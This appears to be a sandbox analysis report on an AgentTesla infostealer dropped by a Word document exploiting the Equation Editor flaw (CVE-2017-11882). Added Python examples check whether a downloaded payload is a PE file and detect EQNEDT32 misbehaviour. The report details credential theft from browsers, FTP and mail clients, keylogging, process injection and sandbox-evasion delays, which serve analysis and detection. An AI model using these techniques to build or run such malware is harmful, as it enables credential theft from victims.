Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2353024476.00000000063F0000.00000004.00000001.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: poiuytrewsdfghjklmnbvcx.exe | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2350007415.0000000002B13000.00000004.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2350002166.0000000002B0F000.00000004.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349941343.0000000002A84000.00000004.00000001.sdmp | String found in binary or memory: https://xWUrFiDn0aBmFXBFM.net
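The "Downloads executable code via HTTP" signature rests on the response body, not on the Content-Type the server claims. As an added example (not Joe Sandbox's code and not taken from the report beyond the values it quotes), the following Python applies that check to the response captured above: the response headers and the first 0x1F0 bytes of the body are transcribed from the hex dump (the rest of the body is not reproduced), and the code verifies the MZ and PE signatures, reads the CLR data directory that marks a .NET image (consistent with the .NET signatures elsewhere in this report), and checks that the end of the last section on disk equals the declared Content-Length. Parsing PE32+ headers goes beyond what this sample needs and is included for completeness.

```python
"""Added example (not Joe Sandbox code): was the HTTP response above a PE download?
Header text and the first 0x1F0 body bytes are transcribed from the report."""
import struct
from datetime import datetime, timezone

# Response headers as captured in the report (X-* headers omitted for brevity).
RESPONSE_HEADERS = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx\r\n"
    "Date: Wed, 27 Jan 2021 18:29:36 GMT\r\n"
    "Content-Type: application/x-msdownload\r\n"
    "Content-Length: 246784\r\n"
    "Connection: keep-alive\r\n"
    "Last-Modified: Tue, 26 Jan 2021 23:18:29 GMT\r\n"
    "\r\n"
)

# Body offsets 0x000..0x1EF (DOS header, PE headers, section table) transcribed from the
# report's "Data Raw" dump; the remainder of the 246784-byte body is not included.
BODY_PREFIX = bytes.fromhex(
    "4d5a90000300000004000000ffff0000" "b8000000000000004000000000000000"
    "00000000000000000000000000000000" "00000000000000000000000080000000"
    "0e1fba0e00b409cd21b8014ccd215468" "69732070726f6772616d2063616e6e6f"
    "742062652072756e20696e20444f5320" "6d6f64652e0d0d0a2400000000000000"
    "504500004c01030020a3106000000000" "00000000e00002010b01080000b60300"
    "000c0000000000001ed4030000200000" "00e00300000040000020000000020000"
    "04000000000000000400000000000000" "0020040000020000acd0030002006085"
    "00001000001000000000100000100000" "00000000100000000000000000000000"
    "c4d303005700000000e00300e8080000" "00000000000000000000000000000000"
    "000004000c0000000000000000000000" "00000000000000000000000000000000"
    "00000000000000000000000000000000" "00000000000000000020000008000000"
    "00000000000000000820000048000000" "00000000000000002e74657874000000"
    "24b403000020000000b6030000020000" "00000000000000000000000020000060"
    "2e72737263000000e808000000e00300" "000a000000b803000000000000000000"
    "00000000400000402e72656c6f630000" "0c000000000004000002000000c20300"
    "00000000000000000000000040000042"
)


def parse_headers(raw: str):
    """Split a raw HTTP response head into (status line, {lower-case name: value})."""
    status, _, rest = raw.partition("\r\n")
    headers = {}
    for line in rest.split("\r\n"):
        if not line:
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def inspect_pe(data: bytes) -> dict:
    """Parse DOS, COFF and optional headers plus the section table from the leading
    bytes of a PE image; raises ValueError when the signatures are not there."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    machine, nsect, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:      # PE32: NumberOfRvaAndSizes at +92, data directories at +96
        nrva, dir_base = struct.unpack_from("<I", data, opt + 92)[0], opt + 96
    elif magic == 0x20B:    # PE32+: 16 bytes further on because ImageBase is 64-bit
        nrva, dir_base = struct.unpack_from("<I", data, opt + 108)[0], opt + 112
    else:
        raise ValueError(f"unexpected optional header magic {magic:#x}")
    clr_rva = clr_size = 0
    if nrva > 14:           # directory 14 is the CLR runtime header; non-zero only in .NET images
        clr_rva, clr_size = struct.unpack_from("<II", data, dir_base + 14 * 8)
    sections = []
    for i in range(nsect):  # 40-byte IMAGE_SECTION_HEADER entries follow the optional header
        name, _, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "raw_size": raw_size, "raw_ptr": raw_ptr})
    return {
        "machine": machine,
        "timestamp": timestamp,
        "link_time": datetime.fromtimestamp(timestamp, tz=timezone.utc).isoformat(),
        "is_dotnet": clr_rva != 0 and clr_size != 0,
        "sections": sections,
        # end of the last section on disk; any bytes past it are overlay data
        "size_from_sections": max((s["raw_ptr"] + s["raw_size"] for s in sections), default=0),
    }


def analyse_response(raw_headers: str, body: bytes) -> dict:
    """Decide whether a response delivered a PE, trusting the bytes over Content-Type,
    and compare the declared length with what the section table accounts for."""
    status, headers = parse_headers(raw_headers)
    declared = int(headers.get("content-length", "0"))
    verdict = {"status": status, "content_type": headers.get("content-type", ""),
               "declared_length": declared, "is_pe": False}
    try:
        pe = inspect_pe(body)
    except ValueError as err:
        verdict["reason"] = str(err)
        return verdict
    verdict.update(is_pe=True, is_dotnet=pe["is_dotnet"], link_time=pe["link_time"],
                   sections=[s["name"] for s in pe["sections"]],
                   size_from_sections=pe["size_from_sections"],
                   overlay_bytes=declared - pe["size_from_sections"])
    return verdict


if __name__ == "__main__":
    for key, value in analyse_response(RESPONSE_HEADERS, BODY_PREFIX).items():
        print(f"{key}: {value}")
```

On the captured bytes the verdict is a 32-bit (machine 0x14C) .NET image with sections .text, .rsrc and .reloc whose section table ends at exactly 246784 bytes, the declared Content-Length, so nothing was appended as an overlay. The COFF timestamp decodes to 2021-01-26T23:17:52 UTC, 37 seconds before the server's Last-Modified value, which is what a freshly built payload uploaded straight to the distribution host looks like. The same function returns is_pe False for a body that merely carries an executable Content-Type, which is why the byte check rather than the header is the one worth alerting on.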

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe | Window created: window name: CLIPBRDWNDCLASS

              System Summary:

.NET source code contains very large array initializations
Source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, <PrivateImplementationDetails>{3DA6FFF0-7A4C-4354-A44A-80CFFE9AEF36}/C8F0ECA3-36A1-4690-8D13-6EC07C1D3DE8.cs -> Large array initialization: .cctor: array initializer size 11944
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE -> File created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE -> File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\boobov[1].exe
Note: boobov[1].exe is a WinINet cache entry, i.e. the file EQNEDT32.EXE downloaded over HTTP (the overview's "Downloads executable code via HTTP"); poiuytrewsdfghjklmnbvcx.exe in Roaming is the copy it then executes. The 11944-byte static array in the .NET payload is the usual place an embedded, encrypted second stage is stored.
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Memory allocated: 76E20000 page execute and read and write (reported twice)
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Memory allocated: 76D20000 page execute and read and write (reported twice)
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Code function: 4_2_011E415D
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Code function: 5_2_011E415D
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Code function: 6_2_00402296
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Code function: 6_2_00225330
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Code function: 6_2_00226348
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Code function: 6_2_0022CB50
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Code function: 6_2_00222089
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Code function: 6_2_00225678
Source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, A/b2.cs -> Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor' (reported twice)
Source: classification engine -> Classification label: mal100.troj.spyw.expl.evad.winDOC@8/13@11/3
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE -> File created: C:\Users\user\Desktop\~$nding Orders Statement -40064778.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE -> File created: C:\Users\user\AppData\Local\Temp\CVRCC34.tmp
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll (reported twice)
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor (12 times)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE -> File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE -> File read: C:\Windows\System32\drivers\etc\hosts (reported twice)
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> File read: C:\Windows\System32\drivers\etc\hosts (reported twice)
Source: Pending Orders Statement -40064778.doc -> Virustotal: Detection: 41%
Source: Pending Orders Statement -40064778.doc -> ReversingLabs: Detection: 47%
Source: unknown -> Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown -> Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown -> Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe (three instances)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE -> Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Note: EQNEDT32.EXE is started with -Embedding, i.e. by COM activation for the equation object embedded in the document, which is why its parent is recorded as unknown rather than WINWORD.EXE; detections should key on EQNEDT32.EXE being the parent of the dropped file, not on Word spawning it. The dropped executable runs as a chain of three instances (EQNEDT32.EXE starts the first, which starts the second, which starts the third). Joe Sandbox numbers them 4, 5 and 6, the prefixes of the memory-dump names and code-function ids elsewhere in this report, so 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack is the image found at base 0x400000 in the third instance.
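The three EQNEDT32.EXE signatures named in the overview (Droppers Exploiting CVE-2017-11882, File Dropped By EQNEDT32EXE, EQNEDT32.EXE connecting to internet) reduce to parent/image conditions on process, file and network events. What follows is an added example, not part of the Joe Sandbox report and not the text of the Sigma rules themselves: a Python implementation of those conditions run over a constructed Sysmon-style event stream that mirrors the process tree above. The svchost.exe parent of EQNEDT32.EXE, the destination address 203.0.113.10 and the notepad.exe line are invented for the example; the executable paths are the ones in the report.

```python
"""Detection logic for the three EQNEDT32.EXE behaviours in this report
(child process, dropped executable, outbound connection), run over a
constructed Sysmon-style event stream. Example code, not part of the
Joe Sandbox report and not the Sigma rules' own text."""
from __future__ import annotations

from typing import Iterable, Optional

PROCESS_CREATE, NETWORK_CONNECT, FILE_CREATE = 1, 3, 11  # Sysmon event IDs
EQNEDT_SUFFIX = "\\eqnedt32.exe"
EXECUTABLE_SUFFIXES = (".exe", ".dll", ".scr", ".com")


def is_eqnedt(image: Optional[str]) -> bool:
    """True when the image path is the Equation Editor binary, case-insensitively."""
    return bool(image) and image.lower().endswith(EQNEDT_SUFFIX)


def eqnedt_spawned_child(ev: dict) -> Optional[str]:
    """Equation Editor has no legitimate reason to start processes; any child is a dropper indicator."""
    if ev["EventID"] == PROCESS_CREATE and is_eqnedt(ev.get("ParentImage")):
        return ev["Image"]
    return None


def eqnedt_dropped_executable(ev: dict) -> Optional[str]:
    """EQNEDT32.EXE writing a PE-like file anywhere on disk."""
    target = ev.get("TargetFilename", "")
    if (ev["EventID"] == FILE_CREATE and is_eqnedt(ev.get("Image"))
            and target.lower().endswith(EXECUTABLE_SUFFIXES)):
        return target
    return None


def eqnedt_network_connection(ev: dict) -> Optional[str]:
    """EQNEDT32.EXE opening any network connection; it is not a network application."""
    if ev["EventID"] == NETWORK_CONNECT and is_eqnedt(ev.get("Image")):
        return f'{ev["DestinationIp"]}:{ev["DestinationPort"]}'
    return None


# Names match the Sigma rules listed in the report overview; the logic is this example's own.
RULES = {
    "Droppers Exploiting CVE-2017-11882": eqnedt_spawned_child,
    "File Dropped By EQNEDT32EXE": eqnedt_dropped_executable,
    "EQNEDT32.EXE connecting to internet": eqnedt_network_connection,
}


def evaluate(events: Iterable[dict]) -> list:
    """Return (rule name, matched artefact) for every event that trips a rule."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            detail = rule(ev)
            if detail is not None:
                hits.append((name, detail))
    return hits


EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
DROPPED = r"C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe"
CACHED = r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\boobov[1].exe"

# Constructed event stream modelled on the process tree in this report. The svchost
# parent, the destination address (a TEST-NET address) and the notepad line are invented.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": EQNEDT, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": f'"{EQNEDT}" -Embedding'},
    {"EventID": 11, "Image": EQNEDT, "TargetFilename": CACHED},
    {"EventID": 3, "Image": EQNEDT, "DestinationIp": "203.0.113.10", "DestinationPort": 80},
    {"EventID": 11, "Image": EQNEDT, "TargetFilename": DROPPED},
    {"EventID": 1, "Image": DROPPED, "ParentImage": EQNEDT, "CommandLine": DROPPED},
    {"EventID": 1, "Image": DROPPED, "ParentImage": DROPPED, "CommandLine": DROPPED},  # self-relaunch, not caught here
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for name, detail in evaluate(SAMPLE_EVENTS):
        print(f"[{name}] {detail}")
```

Run against the constructed stream this raises four alerts: the two files EQNEDT32.EXE writes, its outbound connection, and the first instance of the dropped executable. The step where that executable starts a copy of itself is not caught by any of the three rules; it needs a separate rule for a process spawning its own image (ideally combined with the suspended-creation flag the overview reports), which is the process-hollowing step covered under HIPS / PFW / Operating System Protection Evasion below.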
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: Window Recorder -> Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE -> Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE -> File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: Symwriter.pdb source: poiuytrewsdfghjklmnbvcx.exe
              Source: Binary string: .soap.pdb source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106812604.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000005.00000002.2101520069.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000000.2102067838.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe.2.dr
              Source: Binary string: Symwriter.pdb!CorSymWriter_SxS;..\v1.1.4322\diasymreader.dllI00000000-0000-0000-C000-000000000046 source: poiuytrewsdfghjklmnbvcx.exe, 00000004.00000002.2106812604.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000005.00000002.2101520069.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe, 00000006.00000000.2102067838.00000000011E2000.00000020.00020000.sdmp, poiuytrewsdfghjklmnbvcx.exe.2.dr
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE -> File created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE -> File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\boobov[1].exe
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE -> Process information set: NOOPENFILEERRORBOX (35 times)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE -> Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX (17 times)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE -> Process information set: NOOPENFILEERRORBOX (3 times)
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Process information set: NOOPENFILEERRORBOX (83 times)
Note: NOOPENFILEERRORBOX and NOALIGNMENTFAULTEXCEPT are SetErrorMode flags that suppress error dialogs; they are routine for Office and the .NET runtime and carry no weight on their own.

              Malware Analysis System Evasion:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Thread delayed: delay time: 922337203685477 (reported twice)
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Window / User API: threadDelayed 9698
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2508 -> Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe TID: 2304 -> Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe TID: 2784 -> Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe TID: 2812 -> Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe TID: 2812 -> Thread sleep time: -120000s >= -30000s
Note: the report prints relative waits as negative numbers against its 30000 threshold, and the values are best read as milliseconds despite the "s" suffix. 922337203685477 is Int64.MaxValue / 10000, the millisecond value of a .NET TimeSpan.MaxValue, i.e. a thread parked indefinitely, and 3689348814741908 is exactly four times that; 300000 and 120000 are five and two minutes, which is what the "Contains long sleeps (>= 3 min)" signature in the overview refers to. 9698 is a call count, not a duration: the short-sleep loop behind "Found a high number of Window / User specific system calls". A sandbox that does not shorten such waits times out before the payload acts, so results from a run without sleep patching should not be read as "sample did nothing".
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor (12 times)
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Code function: 6_2_00403918 LdrInitializeThunk,
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Process token adjusted: Debug (reported twice)
Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe -> Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion:

              Injects a PE file into a foreign processes
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe | Memory written: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe base: 400000 value starts with: 4D5A
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe | Process created: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349455339.0000000001230000.00000002.00000001.sdmp | Binary or memory string: Program Manager
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349455339.0000000001230000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
              Source: poiuytrewsdfghjklmnbvcx.exe, 00000006.00000002.2349455339.0000000001230000.00000002.00000001.sdmp | Binary or memory string: !Progman
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe | Queries volume information: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe | Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

              Stealing of Sensitive Information:

              Yara detected AgentTesla
              Source: Yara match | File source: 00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.2348944194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.2107988603.0000000003C6A000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.2349941343.0000000002A84000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2712, type: MEMORY
              Source: Yara match | File source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2572, type: MEMORY
              Source: Yara match | File source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, type: UNPACKEDPE
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
              Tries to steal Mail credentials (via file access)
              Source: C:\Users\user\AppData\Roaming\poiuytrewsdfghjklmnbvcx.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: Yara match | File source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2712, type: MEMORY

              Remote Access Functionality:

              Yara detected AgentTesla
              Source: Yara match | File source: 00000006.00000002.2349919507.0000000002A53000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.2349497357.0000000002631000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.2348944194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.2107988603.0000000003C6A000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.2349585582.00000000026EE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000006.00000002.2349941343.0000000002A84000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2712, type: MEMORY
              Source: Yara match | File source: Process Memory Space: poiuytrewsdfghjklmnbvcx.exe PID: 2572, type: MEMORY
              Source: Yara match | File source: 6.2.poiuytrewsdfghjklmnbvcx.exe.400000.0.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | Windows Management Instrumentation 211 | Path Interception | Process Injection 112 | Masquerading 1 | OS Credential Dumping 2 | Security Software Discovery 11 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
              Default Accounts | Exploitation for Client Execution 13 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 13 | Input Capture 11 | Query Registry 1 | Remote Desktop Protocol | Input Capture 11 | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 11 | Security Account Manager | Virtualization/Sandbox Evasion 13 | SMB/Windows Admin Shares | Archive Collected Data 11 | Automated Exfiltration | Ingress Tool Transfer 12 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
